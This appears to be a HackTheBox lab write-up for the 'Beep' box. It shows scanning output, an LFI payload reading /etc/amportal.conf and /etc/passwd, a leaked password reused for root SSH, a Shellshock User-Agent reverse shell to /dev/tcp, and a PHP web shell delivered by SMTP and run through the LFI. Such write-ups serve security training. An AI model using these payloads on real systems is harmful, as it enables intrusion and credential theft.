Practice
  • 🛤️TryHackMe Rooms
    • HackersVsHackers
    • Vulnnet - The End Game
    • Surfer
    • Corridor
    • Mustacchio
    • Wordpress: CVE-2021-29447
    • Bounty Hacker
    • Simple CTF
    • Agent Sudo
    • Lazy Admin
    • Ignite
    • Brooklynn 99
    • c4ptur3th3fl4g
    • Lian_Yu
    • Rabbit
    • Gallery
    • Overpass
    • Team
    • Easy Peasy
    • CmesS
    • Ultratech
    • Wonderland
    • Anonymous
    • GamingServer
    • Tomghost
    • ConvertMyVideo
    • DogCat
    • Blog
    • Git Happens
    • 0day
    • Road
    • Inferno
    • Opacity
    • Market Place
    • Valley CTF
    • Weasel
    • SafeZone
    • Blueprint
    • Fusion Corp
    • Quotient
    • Unbaked Pie
    • Kenobi
    • Steel Mountain
    • Alfred
    • Hack Park
    • Game Zone
    • Daily Bugle
    • Retro
    • Corp
    • Attacktive Directory
    • Vulnnet - Roasted
    • Vulnnet - Active
    • Vulnnet - Internal
    • Enterprise - Hard
    • Iron Corp - Hard
    • Ra - Hard
    • For Business Reasons
  • 📦HackTheBox
    • Linux Boxes
      • Lame
      • Shocker
      • Nibbles
      • Beep
      • Cronos
      • Nineveh
      • Sense
      • Solidstate
      • Node
      • Valentine
      • Poison
      • Sunday
      • Irked
      • FriendZone
      • Networked
      • Jarvis
      • Tabby
      • Mirai
      • Popcorn
    • Windows Boxes
      • Active
      • Forest
      • ChatterBox
      • Resolute
      • Intelligence
  • 🤖CTF's
    • CloudSEK CTFs
    • ACM Cyber - UCLA
  • ¯\_(ツ)_/¯
    • Interview Topics
  • 🪣BOF - OSCP
    • Basics
    • Spiking
    • FUZZing
    • Finding the Offset
    • Overwriting the EIP
    • Finding BAD Characters
    • Finding RIGHT Module
    • Generating Shellcode
  • 📛Active Directory
    • Basics
      • Managing AD Users
      • Managing AD Computers
      • Group Policies
      • Authentication Methods
      • Trees, Forests and Trusts
    • Enumeration Techniques
    • Initial Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
      • Token Impersonation - LM
      • Kerberoasting
      • cPassword / GPP Attack
      • URL File Attacks
      • PrintNightmare
      • Golden Ticket Attacks
      • ZeroLogon Attacks
    • Lateral Movement and Pivoting
      • File Transfers
      • Spawning Processes Remotely
      • Moving Laterally with WMI
      • Alternate Authentication Material
      • Abusing User's Behaviour
      • Port Forwarding
      • Maintaing Access
      • Pivoting
      • Cleaning Up
    • Other Resources
  • 🛡️Powershell Basics
    • Getting Started
      • Functions
  • 😁Others
    • API Security
    • Cloud Security
  • Enumeration
    • Local PrivEsc
    • Remoting
    • Persistence
    • Kerberos
Powered by GitBook
On this page
  • Scanning
  • Port 443 Enumeration
  • Foothold - 1
  • Foothold - 2
  • Foothold - 3
  1. HackTheBox
  2. Linux Boxes

Beep

Abusing LFI - Abusing shellshock - Abusing SMTP via LFI

Scanning

Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-26 23:45 EST
Nmap scan report for 10.10.10.7
Host is up (0.040s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) AUTH-RESP-CODE PIPELINING UIDL EXPIRE(NEVER) USER RESP-CODES STLS TOP APOP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IDLE MULTIAPPEND CATENATE IMAP4 MAILBOX-REFERRALS Completed SORT=MODSEQ ATOMIC UIDPLUS CONDSTORE X-NETSCAPE RIGHTS=kxte THREAD=REFERENCES URLAUTHA0001 UNSELECT RENAME ANNOTATEMORE ACL NO NAMESPACE IMAP4rev1 QUOTA OK THREAD=ORDEREDSUBJECT SORT ID STARTTLS CHILDREN BINARY LIST-SUBSCRIBED LITERAL+ LISTEXT
443/tcp   open  ssl/https?
|_ssl-date: 2019-12-27T05:50:49+00:00; +1h00m57s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: UnixHost script results:
|_clock-skew: 1h00m56sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 388.60 seconds

Port 443 Enumeration

In this case we have two web servers running on ports 443 and 10000

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.7/ -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/27 13:36:46 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
/vtigercrm (Status: 301)

The directories leak the version of FreePBX (2.8.1.4) being used but not the Elastix version number. I also tried common and default credentials on all the login forms I found in the directories and didn’t get anywhere

searchsploit elastix

The local file inclusion and the RCE looks interesting !

Foothold - 1

searchsploit -m 37637.pl

Looking at the exploit, it seems that the LFI vulnerability is in the current_language parameter

https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

After viewing the source

# This is the default admin name used to allow an administrator to login to ARI bypassing all security.
# Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well
ARI_ADMIN_USERNAME=admin# This is the default admin password to allow an administrator to login to ARI bypassing all security.
# Change this to a secure password.
ARI_ADMIN_PASSWORD=jEhdIekWmdjE

Let’s try to use the above credentials to SSH into the admin account

ssh admin@10.10.10.7            // Doesn't work

Let's view the /etc/passwd to enumerate the users

https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

After filtering through the results, these are the ones I can use

root:x:0:0:root:/root:/bin/bash                                                                                                                                                
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash                                                                                                                            
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash                                                                                                                        
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash                                                                                                               
spamfilter:x:500:500::/home/spamfilter:/bin/bash                                                                                                                               
fanis:x:501:501::/home/fanis:/bin/bash

Let's try with root and it worked !

ssh root@10.10.10.7

Foothold - 2

Webmin portal is vulnerable to ShellShock vuln, Intercept the request in Burp and send it to Repeater. Change the User Agent field to the following string

() { :;}; bash -i >& /dev/tcp/10.10.14.12/4444 0>&1

Foothold - 3

We can abuse the LFI vuln to exec our mail - /var/mail/asterisk

220 beep.example.com ESMTP Postfix

HELO nxg

250 nxg

VRFY asterisk
250 2.1.5

MAIL FROM: example@nxg.com

250 2.1.0 Ok

RCPT TO: example2@nxg.com 

250 2.1.5 Ok

DATA

354 End data with <CR><LF>.<CR><LF>

<?php system($_GET['cmd']); ?>

.

250 2.0.0 Ok: queued as 4227FE00C

QUIT

221 2.0.0 Bye

We can now append cmd and check for any command exec !

https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//var/mail/asterisk%00&module=Accounts&action&cmd=whoami
PreviousNibblesNextCronos

Last updated 1 year ago

📦